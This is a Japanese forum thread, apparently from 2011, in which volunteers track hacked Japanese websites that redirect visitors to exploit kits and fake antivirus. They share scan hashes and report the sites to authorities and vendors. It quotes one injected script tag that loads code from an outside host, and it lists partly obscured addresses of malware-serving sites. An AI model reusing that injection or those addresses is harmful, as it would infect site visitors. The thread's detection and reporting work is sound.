6月1日からは日本がインターネットの枠組みそのものから離脱するのかのう

ノ

も少し待つやうにすんべさ。

>>775は>>773宛

>>774
なんぞなもし。

>>751
10.3.181.16
* IEのみ

>>751
IE　10.3.181.23
Fx　10.3.181.22

http://hibari.2ch.net/test/read.cgi/sec/1299413878/l50
ここの >>937 見てみ
香ばしさいっぱいだからｗｗｗ

それNOD32厨の自演だろｗ

>>779
専ブラ使うといいよ

Java
http://www.jpcert.or.jp/at/2011/at110015.txt

http://www.jpcert.or.jp/at/2011/at110016.html
http://www.jpcert.or.jp/at/2011/at110017.html
http://www.jpcert.or.jp/at/2011/at110018.html
http://www.jpcert.or.jp/wr/2011/wr112201.html

>>751
10.3.181.26

Mass Meshing Injection: sidename.js ongoing
ttp://blog.armorize.com/2011/06/mass-meshing-injection-sidenamejs.html
ttp://www.google.co.jp/search?q=%22script+src%3D%22+sidename.js

まぁ誘導先も正規サイトで組まれているってのは
既にGumblar.xが通った道なので
Armorizeが主張するほど革新的な物ではない気がする

アルファルファモザイクの様子がおかしい

GENOウイルスってもう下火になったのかね
ここも全然レスないし

なってないよ
むしろ流行を終えて定着した

セキュアブレイン gred セキュリティレポートVol.24【2011年6月分統計】
http://www.securebrain.co.jp/about/news/2011/07/gred-report24.html

取扱注意
www●hotel-socatel●be/

釣りに使った場合･･違法になるかどうかはしらん

>>786
今の状況は
Gumblar.xは去年から停止中
8080は一部サイトで不審なコードが定期的に追加される状態が起こってる感じ

>>789
うさんくさいサイトのようだけど
トップページには特に不審なコードはないように思うん

http://www4.ocn●ne●jp/~scicomm4/eisuri●htm

http://www●radio-80●com/soft●exe
偽アンチウィルスソフト配布してるぞ

otyu

>>791
おしんにつーほ。

>>792
404

http://www●ganbanyoku-tsubaki●jp/
ccドメインのexploitコードを食わされるパターン

http://www●expressionengine●jp/
難読化されてるタイプでやっぱりccドメインから

いまきた

>>794
こちらの環境だと*.cu.ccより先に逝けない。。。

>>795
あとでみゆ

あっー、ひとつ手前の*.cz.ccにも逝けなくなった。。。>>794

アクセスログとってるのか？

http://arthurcallum●gozaru●jp
ロシア系？exploiｔキットのドロップゾーン
４０４とか嘘ついてんじゃないよ

jpから来たの弾くパターンもあるみたいだけど
jpドメインをつかって他国の人間をターゲットにするんかいな

>>799
過去ログにその解説があったはずぅー。>>31-32かな。

おぉ、よく見なかった。
踏み台とか結構あったよ>>799

JP外しは結構前からされてる戦略なのか
儲からんし、めんどくさいんだろうなあ

>>794
おくた。

>>795
デジロにつーほ。
でもデジロは遅いので、どなたかふぇーすぶっくから教えてあげてくらはい。。。

>>798
みてみゆ。。。
眠い。

二つ目の*.ruに逝けない。。。>>798

>>798
とりあえずさくらにつーほ。

あきたねる

http://saito-bara●com/funny●html
ccドメインから旅にでます
http://www●e1homes●jp/
おおなつかしいタイプ　ロシアに行こう

おまけ
http://www●momohime-medical●com/~momohime/deary82●html
http://www●passo-co●jp/~passocojp/lean77●html

両方とも同じグループに属してる？踏み台　薬を売ってくれるサイトに誘導してた痕跡がある

てす

>>807
サイバー犯罪対策課に通報済

>>807
それは去年の8080の時のものです
その踏み台リンクと画像(deary82.jpg、lean77.jpg)をのせたメールをボットマシンで配信してた

昼間2ちゃんねる落ちてたね。

>>806-807
おちゅ
つーほーしました。

今も落ちてるよ

www●niki-selection●com
今話題の通販系にインジェクションしちゃうタイプ

>>813
これからみゆお。

また蹴られてる*.えう
orz....

>>813
おちゅ
ど〜ん

http://www●sippo-booomb●com/
去年は動いてたようなやつ
ロシアから直接.jsがやってきてたようだ

>>816
お疲れ様です。
さくらにつーほ。

>>813これだっけ
「osCommerce」の脆弱性を利用したウェブサイトの改ざん被害が拡大 セキュアブレインが『gred セキュリティサービス』『gredでチェック』で対応
http://www.securebrain.co.jp/about/news/2011/08/oscommerce.html

Adobe Flash Player 10.3.183.7

もう、メンドイので直リン
http://hibari.2ch.net/test/read.cgi/win/1305730772/5

>>818
うん

ttp://jsunpack.jeek.org/dec/go?report=a2b5afc3cdb263167efc5ea36747d128f0921f6d

<title>SELECTION</title><script src=http://exero●eu/catalog/jquery.js></script><title></title>

http://exero●eu/をググると感染サイトがゴロゴロしてるな

http://www●asakusa-kagetudo●com/modules/shop/
このディレクトリすごく臭いです。
例えば/shop/es.txt??とか
C&Cサーバっぽいことになってるのかな

よくみりゃIRCでボットに命令するみたいだ

http://iconic-intl●sakura●ne.jp/
これだけだと問題なさそうだけど
こいつをつけるとwolve●html
害はなさそうだけど、アレなページに飛ぶようだ
こういう会社なんだろうか

踏み台にされてるんでしょ

Win32/Daonolの亜種で、midi9を使っていないものってありますか？
症状が全く同じもののPCを持っていますが、本来ある場所にあるはずのmidi9がありません。

すいません。ウイルスが原因ではない問題だったようです。
スレ汚し失礼しました

>>825
あるとおもうよ
そういう調べ方はやめたほうがいい

http://www●ibs-radio●com

www●dinsuceava●roがアレですかね・・・

>>828
ですね~

Google セーフ ブラウジング診断 より
疑わしいサイトとして認識されています。このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
過去 90 日間に、このサイトの一部で不審な動きが 2 回検出されています。

このサイトで過去 90 日間に Google がテストした 92 ページのうち 23 ページで、
ユーザーの同意なしに不正なソフトウェアがダウンロードされ、インストールされていたことが判明しました。
Google が最後にこのサイトを巡回したのは 2011-09-23 で、このサイトで不審なコンテンツが最後に検出されたのは 2011-09-23 です。
不正なソフトウェアには 24 trojan(s) などがあります。感染先のコンピュータで平均 4 個のプロセスが新たに発生しています。


Online Link Scan （AVG・Google・SiteTruth・PhisTank） ・・・ 未検出
セキュアブレイン gred ・・・ 未検出orz（通報済み）
シマンテック ・・・ 未検出orz（通報済み）

今北

>>828
リロードしたらスクリプト消えたん。

>>829
乙です。

とりあえずJSUNPACKにスクリプトかけてみたお。（その間に対応されてた。）
407f4efb5e405a90d8aee230d5676eb4b3b795a6

被害サイトは・・・IBS 茨●放送
茨●県を放送対象地域とする中波（AM）放送局を保有する
基幹放送局提供事業者である
株式会社IBSの設備を利用してラジオ放送を行っている。

茨●方面、他にもあるかもよ
roはルーマニアのドメインだね

一応こちらからもJPCERT/CCとIPA他にスクリプトとその先のスクリプト、>>828の下でのぉとんせぃふうぇぶで出てくるjarを送ったお。

VTいきなり死んだ。。。orz.........

>>829-832 ご確認とご対応ありがとうございました。
特に◆.htmlint.Uさんは毎回お疲れ様でございます！

識別代わりにコテ付けてるだけです。
八頭さん、コテハンさん、夷塚さんをはじめとするコテの方々、名無しのみなさんに比べればまだまだです。

なによりもお伝えいただいた828さんに感謝です。

とりあえずここのスレに挙げられているサイトを
サイトのアドレスの一部をワイルドカードと合わせてavastのサイトブロックに登録するだけで有効かな?

http://konishi-ballet●com/
すごいことになってますな

>>835
まぁ、ここで出たのを初回として3回目のとこを管理者だめっぽいので>>832の時にIPAにつーほーすた。

>>828
ここが震源地だたぁーのね。
http://hatsukari.2ch.net/test/read.cgi/news/1316848525/

>>836
目が痛い。。。

>>836
お疲れ様です。
鯖缶、上位鯖缶とかにつーほーしました。

茨城繋がりだたーのね。

Tokyo鯖の●阪のバレエ研究所らしいorz
IPA往きが一番いいけど・・・土日とか大丈夫なんだろうか？

>>1
>>5について、日本地域における性能・効果も加味して再検討をしてみた方がいいかも
http://hibari.2ch.net/test/read.cgi/sec/1314348991/7
いづれにしろ攻撃は止まないし、無差別で、拡散も速い

>>839
鯖缶が茨城。。。
>>806と同じらしいスクリプトも
誰かが投げた分
http://www.virustotal.com/file-scan/report.html?id=8a354b3b17a4d753f6ed9e6c9f62898b60a4888b8f543eca6abc399199262de7-1312351077
漏れが投げたの
http://www.virustotal.com/file-scan/report.html?id=8a354b3b17a4d753f6ed9e6c9f62898b60a4888b8f543eca6abc399199262de7-1316904594
まぁ偶然だと思いますが。

関連性でいうと大学のアメフト、大学のラクロス、大学の薙刀のほーが感染経路的に分かりやすかったかも。

>>837
>まぁ、ここで出たのを初回として3回目のとこを管理者だめっぽいので>>832の時にIPAにつーほーすた。
何を言っているのかわからない
「ここで出たのを初回として3回目のとこを管理者だめっぽいので」ってどういうこと?

>>841
一度対応されてから、再改竄->再対応、再々改竄を確認したのがあったので。

日本語では「3回目なので」と言うんだ

(ﾟνﾟ)ﾆﾎﾝｺﾞﾑｽﾞｶｽｨﾈｰ

>>840
なるほど>>6には無いけど
登録が東京でもピュアニックは茨●なんだね
関連性や着眼点はランダムであっても注視しておいた方が後学にはなるかも

Google セーフ ブラウジング診断は、追跡開始と同時に90日間の結果も教えてくれる
各自、地元放送局やラジオ局など気になるキーワードでざっと調べてみるといいよ

>>792はローグソフトばら撒く砲台リンクってわかってここに書いた後、すぐになくなってしまった。
http://www●ganbanyoku-tsubaki●jp/
ここって絶賛放置中でしたっけ

>>846
今現在、TrendMicroとFortinetだけ反応してるようだ

Aviraとセキュアブレインとシマンテックへ依頼を出しました。

>>846
(　ﾟдﾟ)ﾋﾞﾝｺﾞｰ>>794
>>837,841-842

>>848
乙です。

http://www●cometcrash●com

このサイト乗っ取られちゃってるんですかね？
グーグルのキャッシュだとゲーム関連のサイトのようですし。

>>850
Server HackeD By TiGER M@TE

遊んでますねｗ

2000鯖サイト改竄の模様ですが.....

怪しげなGenuineCheck.exeが開くと落ちて着ます
サイト開くのに必要なのか.....Winエミ梨で実行不能だけど

ttp://www.google.co.jp/search?q=%22jjghui.com%2Furchin.js%22

もう何も見えない

JSUNPACK
1f8a23b66cec81cb6d0305139524e72e0a7ec842

んーどぼじよう

>>854は目の痛み

>>854
リンク先のアダルトサイトからscandsk.exeが落ちてきた
…けどVMで実行しても何も起きず。

とりあえずavastに検体提出

>>853
ｵﾂｶﾚｻﾏです。
&lr=lang_ja
日本語ページのある彼の国とこへメル
蒲公英は現在無い模様。。。

>>856
お疲れ様です。
nu蹴られちゃってるっぽいので助かりまうす。

っと、もひとつあたー>>857

>>858
FakeAVげと
http://www.virustotal.com/file-scan/report.html?id=1d2aab09516985ff529e5d05a4a496f8f4ac911f62713066906c117789dc0ed3-1317997276

結構なスルー率だねえ

>>859
過去ログっぽかった。
あきたねる

>>860-861
BitDefenderだけｗ

VTしぼー中
>>860
別のアドレスに飛ばされるようになたー。ファイルは同じもの

http://www●huimeihotel●com/
http://www●huihuahotel●com●cn/

evar●lflink●comがそうなのかな

ckt6●cnじゃなイカ？

>>865-866
ノ

>>865
IPAとかにつーほー

>>866
IPAとかに丸投げしますた。。。おｒｚ。。。。。。

>>583
>>853
( ﾟ∀ﾟ)ｱﾊﾊ八八ﾉヽﾉヽﾉヽﾉ ＼ / ＼/ ＼

だりかお願い

ﾉｼｼ


やっと消えたお >>868,>>583

>>866-867
乙です〜

>>870
ノ


悲しいお知らせ
折角10/43まで逝った>>860ですが…
http://www.virustotal.com/file-scan/report.html?id=7e3d271dd1883d44051abb2b0380248cb7dd58164b18bb34a15a4031a5ac37e5-1318345034
4/43のご新規になりますた。。。

>>871
いつも乙です
時間のある時にでもまた検体調査に行ってくるかな・・・

>>871
むゎたかわったぁ
http://www.virustotal.com/file-scan/report.html?id=1f4580667000cf8c8a2875f2520babd38c013c73e0ac5b5da2ee254438119239-1318425656
4/43

こりゃてーへんだ＞ベンダー

>>873
落ちてくる検体も変わったねぇ
http://www.virustotal.com/file-scan/report.html?id=740e94ee09dd9c14a0885e45435e78fb384928f4823f0a1a9115e9af83c3dfd4-1318432094
相変わらず何も起きないけど

VT
うｒｌ
c41e3a4f7ce7de96783854658a1241c7-1318588576
ふぁいる
786d47110b92908dd5ced091bfea6046ddd8a87b0770abecfae61628b7199563-1318596141

JSUNPACK
f0091f107e0bd469a047c33d1f9c4c20c4d239d9

飛び先はまたころころ変わりそう。。。

http://www.virustotal.com/file-scan/report.html?id=494c5d3dd3386193f3ca72d7a31c04cbf99420b49fd7a32c0c0f3a0834010d8c-1318596879
6/43

>>874
exeお願いします。m(_ _)m

>>876
すでにリンク先が変更に・・・毎日変更ですかorz
今回はWebページ型FakeAV付き

Jsunpack
928990f5a388f32839a21c81c23ee4f880d42693

Webページ
f958e91b6e19ecfb7d6fac4c94231b0abb7ad2bac31c692b9c87ff6027a8bacb-1318684027
2/ 42 (4.8%)

本体EXE
8065d71f793769d4d9cc1c341e2d038d95428e0aeeaf3702c9e31ff590921747-1318684037
12/ 43 (27.9%)

落ちてきたルートキット？(既出っぽい)
8fb7c5dc29ca514bc2987d270513c86a3084466b23213d224408c682b8171405-1318684489
25/ 43 (58.1%)

>>877
お疲れ様です。

ぐぐったこれは関連するのかな？
ttp://www.threatexpert.com/report.aspx?md5=af0099681d9d24d1f887562e9d8c180a

>>878
いつもお疲れ様です

MD5同じなので同じファイルっぽいですね
scandsk.exeが相変わらず何もしないのでAnubisで解析させてみた
http://anubis.iseclab.org/?action=result&task_id=1a146b96de71dc7d4d5f47216b74caffe&format=html#id285810

…鯖が死んでてマルウェアダウンロードに失敗してるのかな

>>879
どもです。
またぐぐる。
http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~FakeAV-EPV/detailed-analysis.aspx
http://about-threats.trendmicro.com/malware.aspx?language=jp&name=TROJ_FAKEAV.GAC

301でbingに飛ばしてるとこはまだ死んでないっぽい？

aHR0cDovL21lZ2Fsb2Rvbi5qcC8yMDExLTEwMTYtMDQyNC0wNi93d3cuZGFuLmNvLnVrL3ZpZXdz
b3VyY2UvaW5kZXgucGhwP3VybD1odHRwJTNBJTJGJTJGOTguMTQyLjI0My42NCUyRmNocm9tZSUy
RnJlcG9ydC5odG1sJTNGNTU1NTV3NSUzRCU1RCVFRiVCRiVCRCVFRiVCRiVCRGNrJUVGJUJGJUJE
Y2dqZCVFRiVCRiVCRGolRUYlQkYlQkRqbW5oZSVEOCU5OSVFRiVCRiVCRG4lRUYlQkYlQkQlRUYl
QkYlQkQlRUYlQkYlQkQlRUYlQkYlQkRnJUVGJUJGJUJEZGtfamslNUIlRUYlQkYlQkQlRUYlQkYl
QkRyJUVGJUJGJUJEJUVEJThEJTg5JTVFJUVGJUJGJUJEJUVGJUJGJUJEJUVGJUJGJUJEb2Nna2RU
JUVGJUJGJUJEJUVGJUJGJUJEJUVGJUJGJUJEciVFRiVCRiVCRCVFRiVCRiVCRGIlQ0MlODhfJUVG
JUJGJUJEJUVGJUJGJUJEJUVGJUJGJUJEcWdveHVkZ3lramhnaHolRUYlQkYlQkR6a3phZXdoYmN2
Y2Nsamlmd2YlNUIlRTklOUElQUN1X2FkYiU1RWRkYyU1RWZkZmVlZWUlRUYlQkYlQkRlaWpUJUVG
JUJGJUJEcWIlNUViZGNfZmhZ

EXEとWebページがまた新型に。本当に毎日変更ですなｗ

EXE
16d9696f4a32bcd571c5c55ac5e4fcb9cc3348ac7ec936ad6c46c447e63d626b-1318780277

Webページ
ab0e74102c941cff75b0ee3469c95a41484d29043d17f874a5faa5f14665805d-1318781102

VMだから偽アンチウイルスが発動しないのか、日本IPは弾かれてるのか…
往時の8080は鯖さえ生きてればお構いなく発動したもんですが

もう、いやん
JSUNPACK
d127c4dba13422aaba02157e6e0111c09d91401f

http://hibari.2ch.net/test/read.cgi/sec/1006822399/429

>>883
http://www.google.co.jp/search?q=site:www.bookoff.co.jp+%E6%94%B9%E3%81%96%E3%82%93
子会社含めて今度で4回目って酷いな
HP管理委託業者の名前を晒してほしい

ブックオフかい…

http://koikemasaya●com/

gredでフィッシングサイト判定になっていて改ざんされてるっぽい

大規模なASP.NET攻撃によりWebサイトが訪問者を攻撃
http://scan.netsecurity.ne.jp/archives/52024460.html

>>853

>>886
侵略されちゃってますね

>>886
投稿フォームからのスパムっぽい
とりあえずスパムの削除依頼してみた＞ばりゅどめ

>>889-890
ご対応感謝するでゲソ！

virscan.orgって更新されたっぽい？

ぱっと見た感じ従来と変わらんようだけど?

http://uptime.netcraft.com/up/graph?site=http://virscan.org/
IPアドレスが一時的に変わってた
代替サーバにしてメンテナンスしてたのかも

ﾉｼ

Flash 11.1.102.55

ESETのステマサイトだろうけどGumblarの解説としては読みやすい
http://www.seculead.jp/tokushu/gumblar.html
http://30tx.com/ ツイッターで宣伝中 http://goo.gl/sNq5y+

公式で堂々とやらないのが-100点

Gumblarは今は活動してないよ
Gumblar.xは2010年11月以降動かず止まったまま
htaccessリダイレクトは偽ウイルス対策ソフトの感染キャンペーン

Wordpressのtimthumb.phpの脆弱性でだいぶ攻撃がお盛ん (´Ａ｀;
ttp://www.google.co.jp/search?q=%22Fatal+error:+Cannot+redeclare+_765258526%22&hl=ja&lr=lang_ja&num=100

>>898
ぅゎゎ

調子悪いので保留。。。orz.....

こんなかんじ？
JSUNPACK
899a47a3cb97a613973f7721405b58670ee8a5ad
飛び先は404っぽい

なんか違ってた
>>900はなかったことに。。。

ん？合ってるんかな？

ドメインの解決が出来ないんだけど
いろいろあるみたい
ttp://www.google.com/safebrowsing/diagnostic?site=osa.pl
ttp://www.siteadvisor.com/sites/osa.pl/msgpage
ttp://safeweb.norton.com/report/show?url=osa.pl

げっとしたっぽい

aHR0cDovL21lZ2Fsb2Rvbi5qcC8yMDExLTExMjUtMjIzOC0wNy9yZC5vci50bC9nZXQucGhwP3Np
dGU9aHR0cCUzQSUyRiUyRm1lc3Npbm9oZXlhJTJFaW5mbyUyRmF1dGhvciUyRmFkbWluJmFjdD12
aWV3


二回目以降のアクセスはスクリプトが消える仕様？

aHR0cDovL21lZ2Fsb2Rvbi5qcC8yMDExLTExMjUtMjI0OC0yMS9yZC5vci50bC9nZXQucGhwP3Np
dGU9aHR0cCUzQSUyRiUyRm1lc3Npbm9oZXlhJTJFaW5mbyUyRmF1dGhvciUyRmFkbWluJmFjdD12
aWV3DQpodHRwOi8vbWVnYWxvZG9uLmpwLzIwMTEtMTEyNS0yMjMyLTQ3L3d3dy5kYW4uY28udWsv
dmlld3NvdXJjZS9pbmRleC5waHA/dXJsPWh0dHAlM0ElMkYlMkZtZXNzaW5vaGV5YSUyRWluZm8l
MkZhdXRob3IlMkZhZG1pbg==


>>900で見つけたはずなのに、わからなくなったので>>901

>>898
こりか
http://www.jpcert.or.jp/wr/2011/wr113001.html#3

>>904
http://www.virustotal.com/file-scan/report.html?id=a08fca5de60440093999018312d12c97e3927b5f2af75348633d264748852d33-1322234054

　

[厚労省サーバー感染、ＰＣ１万台ネット接続不能]
http://www.yomiuri.co.jp/national/news/20111129-OYT1T01327.htm

労災などの業務管理を行う厚生労働省の情報システムのサーバーが、ウイルス対策ソフトを装ったコンピューターウイルス
に感染し、同システムにつながる全国約１万台のパソコンが点検のため、今月２５日からインターネットに接続できなくな
っていることが、わかった。情報流出は確認されていない。ウイルスは無差別に感染するタイプとみられ、同省が復旧を急
いでいる。

同省によると、感染したのは、労災の申請や認定、支給などの処理を行う情報システム。今月２５日、福岡労働局の職員が
業務中に企業のホームページを閲覧中、パソコンが勝手にウイルス検索を始めるなどしたため、不審に思った職員が申し出
て感染が判明した。
ウイルス対策会社によると、このウイルスはネット上で仕込まれたページを開いただけで感染するタイプで、ウイルス対策
ソフトを装ってクレジットカード情報などを要求。２年ほど前から国内でも感染が増加しているという。

▽読売新聞（2011年11月30日03時09分）

コンピューターウイルスにやられたと偽って
わざと流出させている恐れもある

ちゃんとJRE 6 Update 29にしておるかー？
そこで対処されたCVE-2011-3544の攻撃処理がBlackholeに積まれたぞい ヽ(;´Д｀)ノ
ttps://www-304.ibm.com/connections/blogs/tokyo-soc/entry/dbyd_20111031

www●cave●co●jp

Googleでは「このサイトはコンピュータに損害を与える可能性があります。」になってる

ちょいまえに北
見てる途中でメンテになったお
ここ見てるのかな？

ユーザーから言われたか何かで気づいたのかもしれん

そかも

とりあえずそれっぽいのはげとしたかも
飛び先は404っぽい

JS（ｒｙ
8674564d35fb2e06f5ec059b6bfded1b26c048ea

V（ｒｙ
9f065297b0fa42157b748f285347a1d3a8401d3e9c58dee686fd82392b169abc

IPAとJPCERT/CC、ベンダーいくつかにトス

まかひからdatが北
なんか早いぽ。

>>914
あびら対応予定
JS/IFrame.aba

www●wisdomlead●co●jp/

眩暈が

>>917
お疲れ様です。
上流にメルしまひた。

なつかしの8080とかぱっとみでみっつスクリプトの内ふたつは検出率が低かったのでベンダーにトスしやした。
かすぺの自動応答にスパム扱いされちゃいました。
踏み台になってたかもん